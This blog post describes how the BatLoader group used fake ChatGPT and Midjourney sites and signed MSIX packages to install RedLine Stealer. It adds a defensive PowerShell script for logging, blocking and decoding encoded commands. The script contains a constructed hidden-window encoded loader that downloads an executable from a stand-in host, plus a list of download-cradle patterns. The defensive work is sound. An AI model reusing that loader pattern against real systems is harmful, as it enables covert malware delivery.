Fake ChatGPT and Midjourney Sites used in Cyber-Attacks *** Updated ***

It was only a matter of time before something like this happened. As services like ChatGPT, Midjourney, Bard and other “AI” platforms went viral, threat actors were bound to start trying to get in on the action. ChatGPT and Midjourney were easy targets because neither had a standalone app at the time; to use them you had to go to their online presence, ChatGPT’s website or Midjourney’s Discord. That gap allowed the threat group known as BatLoader to start impersonating both of them via cleverly crafted Google search ads.

The new campaign was discovered by eSentire’s Threat Response Unit, who published their findings on Tuesday, May 16th, 2023. Once a target has been lured to the fake ChatGPT web page, the page pushes the user to download what is presented as a plugin/app for the popular AI. The download link points to an MSIX package signed with a valid code-signing certificate, which makes it harder to identify as malicious. The MSIX package then executes both an executable and a PowerShell script as part of the attack chain. The script downloads RedLine Stealer and checks in with the C2 server so the operators can track new infections. The executable appears to be nothing more than a distraction at this stage: once the install completes, it pops up the legitimate ChatGPT page inside a window.

For Midjourney the attack chain is similar, but the PowerShell script is Base64-encoded to obfuscate it. In all other respects it operates the same as the ChatGPT one.

The signing of the MSIX packages is noteworthy because it shows a level of sophistication. BatLoader knows that unsigned packages will not install on the operating system they currently target (Windows), so they have made sure they can clear that particular hurdle. Keep in mind that a valid signature only proves the package was signed with a certificate the OS trusts; it says nothing about whether the contents are benign, so a signed MSIX should not be treated as safe on that basis alone. Running a PowerShell script in the background is a fairly common method for silently installing malware and other malicious tools. It can be prevented with the right Windows security settings, such as blocking script execution as a spawned process and blocking or alerting on obfuscated scripts. These steps are relatively simple for a business, but in the consumer world they are not currently easy to get done and are not part of most popular consumer antimalware products. That leaves a lot of people exposed to this attack as the popularity of AI services grows. For now, it is important to stress that neither ChatGPT nor Midjourney have published apps. Any site that claims they have is lying to you.
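As an added example that is not part of the original post or of eSentire’s findings, the PowerShell below turns on the two settings the paragraph above describes (script block logging and the Defender Attack Surface Reduction rule that blocks obfuscated scripts), decodes the kind of Base64-encoded PowerShell command line mentioned for the Midjourney variant, and lists sideloaded MSIX packages for triage. The ASR rule GUID is the one Microsoft publishes for that rule and should be confirmed against the ASR rules reference before deploying; the sample command line and the example.invalid host are constructed for the illustration and are not indicators from the campaign.

```powershell
# Added example, not code from the original post or from eSentire's report.
# Run in an elevated Windows PowerShell session on a host with Microsoft
# Defender. Sections 1 and 2 are the settings the paragraph above refers to;
# sections 3 and 4 are the checks a responder would run afterwards.

# 1. Script Block Logging: every script block that executes is written to
#    Microsoft-Windows-PowerShell/Operational as event ID 4104, and a
#    Base64-encoded or otherwise obfuscated block is logged in decoded form.
function Enable-ScriptBlockLogging {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

# 2. Defender Attack Surface Reduction rule "Block execution of potentially
#    obfuscated scripts". The GUID is the one Microsoft publishes for that
#    rule; confirm it against the ASR rules reference before deploying.
#    Start with -Audit so you can see what would have been blocked.
function Enable-ObfuscatedScriptRule {
    param([switch]$Audit)
    $ruleId = '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC'
    $action = if ($Audit) { 'AuditMode' } else { 'Enabled' }
    Add-MpPreference -AttackSurfaceReductionRules_Ids $ruleId `
                     -AttackSurfaceReductionRules_Actions $action
}

# 3. Decode a -EncodedCommand argument from a process command line.
#    powershell.exe accepts abbreviations (-e, -ec, -enc) and the payload is
#    UTF-16LE, which is why [Text.Encoding]::Unicode is used, not UTF8.
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
    }
    return $null
}

# 4. Triage: MSIX/Appx packages that did not come from the Store. A valid
#    code-signing certificate lets a package install, but a sideloaded
#    "ChatGPT app" from an unfamiliar publisher still shows up here.
function Get-SideloadedAppx {
    Get-AppxPackage -AllUsers |
        Where-Object { $_.SignatureKind -notin @('Store', 'System') } |
        Select-Object Name, Publisher, SignatureKind, InstallLocation
}

# Constructed sample (not an indicator from the campaign): a hidden-window
# loader whose encoded body fetches a payload from a hypothetical host.
$inner   = 'Invoke-WebRequest http://example.invalid/update.exe -OutFile "$env:TEMP\update.exe"'
$sample  = 'powershell.exe -nop -w hidden -enc ' +
           [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$decoded = ConvertFrom-EncodedCommand -CommandLine $sample
Write-Output "Decoded command: $decoded"

# Download cradles are the tell in a loader stage; alert on them after decoding.
if ($decoded -match 'Invoke-WebRequest|iwr|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer') {
    Write-Output 'ALERT: encoded PowerShell contains a download cradle'
}

# Apply the settings (commented out so the script is safe to read-run):
# Enable-ScriptBlockLogging
# Enable-ObfuscatedScriptRule -Audit
# Get-SideloadedAppx | Format-Table -AutoSize
```

Script block logging is the cheaper win on a consumer machine because it needs no Defender licensing tier; the ASR rule is the one that actually stops the stage, so put it in audit mode first and review the resulting events before switching it to Enabled.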

Update 05-18-2023
OpenAI has officially announced a ChatGPT app for iOS, available on Apple’s App Store. Below are the legitimate links for the app. There is still no Windows app for ChatGPT or Midjourney.
https://apps.apple.com/app/openai-chatgpt/id6448311069
https://openai.com/blog/introducing-the-chatgpt-app-for-ios
